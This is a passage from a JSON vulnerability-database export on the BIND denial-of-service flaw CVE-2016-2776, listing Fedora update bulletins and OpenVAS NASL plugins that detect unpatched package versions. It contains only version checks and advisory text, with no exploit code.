["CVE-2016-2776"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. This package set contains only export version of BIND libraries, that are used for building ISC DHCP. ", "modified": "2016-10-09T03:15:53", "published": "2016-10-09T03:15:53", "id": "FEDORA:1BA44608799E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: bind99-9.9.9-2.P3.fc25", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. This package set contains only export version of BIND libraries, that are used for building ISC DHCP. ", "modified": "2016-10-24T23:52:20", "published": "2016-10-24T23:52:20", "id": "FEDORA:12A2D604E441", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: bind99-9.9.9-2.P3.fc23", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. ", "modified": "2016-10-09T03:16:02", "published": "2016-10-09T03:16:02", "id": "FEDORA:22EA060879B9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: bind-9.10.4-2.P3.fc25", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "openvas": [{"lastseen": "2019-12-11T19:36:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "ISC BIND is prone to a denial of service vulnerability.", "modified": "2019-12-10T00:00:00", "published": "2016-09-28T00:00:00", "id": "OPENVAS:1361412562310106291", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106291", "type": "openvas", "title": "ISC BIND Denial of Service Vulnerability", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# ISC BIND Denial of Service Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:isc:bind\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106291\");\n script_version(\"2019-12-10T15:03:15+0000\");\n script_tag(name:\"last_modification\", value:\"2019-12-10 15:03:15 +0000 (Tue, 10 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-09-28 09:42:23 +0700 (Wed, 28 Sep 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_cve_id(\"CVE-2016-2776\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"ISC BIND Denial of Service Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"bind_version.nasl\");\n script_mandatory_keys(\"isc/bind/detected\");\n\n script_tag(name:\"summary\", value:\"ISC BIND is prone to a denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A crafted query could crash the BIND name server daemon, leading to a\n denial of service. All server roles (authoritative, recursive and forwarding) in default configurations are\n affected.\");\n\n script_tag(name:\"impact\", value:\"An remote attacker may cause a denial of service condition.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to 9.9.9-P3, 9.9.9-S5, 9.10.4-P3, 9.11.0rc3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://kb.isc.org/docs/aa-01419\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_proto( cpe:CPE, port:port ) ) exit( 0 );\n\nversion = infos[\"version\"];\nproto = infos[\"proto\"];\n\nif (version !~ \"^9\\.\")\n exit(99);\n\nif (version =~ \"^9\\.9\\.[3-9]s[0-9]\") {\n if (version_is_less(version: version, test_version: \"9.9.9s5\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"9.9.9-s5\");\n security_message(port: port, data: report, proto: proto);\n exit(0);\n }\n} else {\n if (version_is_less(version: version, test_version: \"9.9.9p3\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"9.9.9-p3\");\n security_message(port: port, data: report, proto: proto);\n exit(0);\n }\n\n if (version_in_range(version: version, test_version: \"9.10.0\", test_version2: \"9.10.4p2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"9.10.4-P3\");\n security_message(port: port, data: report, proto: proto);\n exit(0);\n }\n\n if ((revcomp(a: version, b: \"9.11.0a1\") >= 0) && (revcomp(a: version, b: \"9.11.0rc1\") <= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"9.11.0rc3\");\n security_message(port: port, data: report, proto: proto);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-11-14T00:00:00", "id": "OPENVAS:1361412562310809943", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809943", "type": "openvas", "title": "Fedora Update for bind FEDORA-2016-2d9825f7c1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind FEDORA-2016-2d9825f7c1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809943\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-14 17:59:56 +0530 (Mon, 14 Nov 2016)\");\n script_cve_id(\"CVE-2016-2776\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for bind FEDORA-2016-2d9825f7c1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bind on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-2d9825f7c1\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SU2VHQBXQ5XC2UZNI5WA53PQIT5VQ5HG\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.10.4~2.P3.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-11-14T00:00:00", "id": "OPENVAS:1361412562310809906", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809906", "type": "openvas", "title": "Fedora Update for bind99 FEDORA-2016-cca77daf70", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind99 FEDORA-2016-cca77daf70\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809906\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-14 17:59:03 +0530 (Mon, 14 Nov 2016)\");\n script_cve_id(\"CVE-2016-2776\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for bind99 FEDORA-2016-cca77daf70\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind99'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bind99 on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-cca77daf70\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RPJKE446DGE76LAXI25N4TS6VZAOMTXE\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind99\", rpm:\"bind99~9.9.9~2.P3.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2016-10-05T00:00:00", "id": "OPENVAS:1361412562310871664", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871664", "type": "openvas", "title": "RedHat Update for bind97 RHSA-2016:1945-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for bind97 RHSA-2016:1945-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871664\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-05 15:43:18 +0530 (Wed, 05 Oct 2016)\");\n script_cve_id(\"CVE-2016-2776\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for bind97 RHSA-2016:1945-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind97'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Berkeley Internet Name Domain (BIND)\nis an implementation of the Domain Name System (DNS) protocols. BIND includes a\nDNS server (named) a resolver library (routines for applications to use when\ninterfacing with DNS) and tools for verifying that the DNS server is operating\ncorrectly.\n\nSecurity Fix(es):\n\n * A denial of service flaw was found in the way BIND constructed a response\nto a query that met certain criteria. A remote attacker could use this flaw\nto make named exit unexpectedly with an assertion failure via a specially\ncrafted DNS request packet. (CVE-2016-2776)\n\nRed Hat would like to thank ISC for reporting this issue.\");\n script_tag(name:\"affected\", value:\"bind97 on\n Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:1945-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-September/msg00033.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind97\", rpm:\"bind97~9.7.0~21.P2.el5_11.7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-chroot\", rpm:\"bind97-chroot~9.7.0~21.P2.el5_11.7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-debuginfo\", rpm:\"bind97-debuginfo~9.7.0~21.P2.el5_11.7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-devel\", rpm:\"bind97-devel~9.7.0~21.P2.el5_11.7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-libs\", rpm:\"bind97-libs~9.7.0~21.P2.el5_11.7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-utils\", rpm:\"bind97-utils~9.7.0~21.P2.el5_11.7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "Check the version of bind", "modified": "2019-03-08T00:00:00", "published": "2016-09-29T00:00:00", "id": "OPENVAS:1361412562310882565", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882565", "type": "openvas", "title": "CentOS Update for bind CESA-2016:1944 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bind CESA-2016:1944 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882565\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-29 05:43:22 +0200 (Thu, 29 Sep 2016)\");\n script_cve_id(\"CVE-2016-2776\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for bind CESA-2016:1944 centos5\");\n script_tag(name:\"summary\", value:\"Check the version of bind\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Berkeley Internet Name Domain (BIND)\nis an implementation of the Domain Name System (DNS) protocols. BIND includes\na DNS server (named) a resolver library (routines for applications to use\nwhen interfacing with DNS) and tools for verifying that the DNS server is\noperating correctly.\n\nSecurity Fix(es):\n\n * A denial of service flaw was found in the way BIND constructed a response\nto a query that met certain criteria. A remote attacker could use this flaw\nto make named exit unexpectedly with an assertion failure via a specially\ncrafted DNS request packet. (CVE-2016-2776)\n\nRed Hat would like to thank ISC for reporting this issue.\");\n script_tag(name:\"affected\", value:\"bind on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:1944\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-September/022092.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.6~25.P1.el5_11.9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.6~25.P1.el5_11.9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.6~25.P1.el5_11.9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.6~25.P1.el5_11.9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.6~25.P1.el5_11.9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.6~25.P1.el5_11.9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.6~25.P1.el5_11.9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.6~25.P1.el5_11.9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "Check the version of bind", "modified": "2019-03-08T00:00:00", "published": "2016-09-29T00:00:00", "id": "OPENVAS:1361412562310882564", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882564", "type": "openvas", "title": "CentOS Update for bind CESA-2016:1944 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bind CESA-2016:1944 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882564\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-29 05:43:19 +0200 (Thu, 29 Sep 2016)\");\n script_cve_id(\"CVE-2016-2776\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for bind CESA-2016:1944 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of bind\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Berkeley Internet Name Domain (BIND)\nis an implementation of the Domain Name System (DNS) protocols. BIND includes\na DNS server (named) a resolver library (routines for applications to use\nwhen interfacing with DNS) and tools for verifying that the DNS server is\noperating correctly.\n\nSecurity Fix(es):\n\n * A denial of service flaw was found in the way BIND constructed a response\nto a query that met certain criteria. A remote attacker could use this flaw\nto make named exit unexpectedly with an assertion failure via a specially\ncrafted DNS request packet. (CVE-2016-2776)\n\nRed Hat would like to thank ISC for reporting this issue.\");\n script_tag(name:\"affected\", value:\"bind on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:1944\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-September/022097.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs-lite\", rpm:\"bind-libs-lite~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-license\", rpm:\"bind-license~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-lite-devel\", rpm:\"bind-lite-devel~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-pkcs11\", rpm:\"bind-pkcs11~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-pkcs11-devel\", rpm:\"bind-pkcs11-devel~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-pkcs11-libs\", rpm:\"bind-pkcs11-libs~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-pkcs11-utils\", rpm:\"bind-pkcs11-utils~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb-chroot\", rpm:\"bind-sdb-chroot~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.4~29.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-03-17T22:56:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2016-10-26T00:00:00", "id": "OPENVAS:1361412562310120740", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120740", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-751)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# 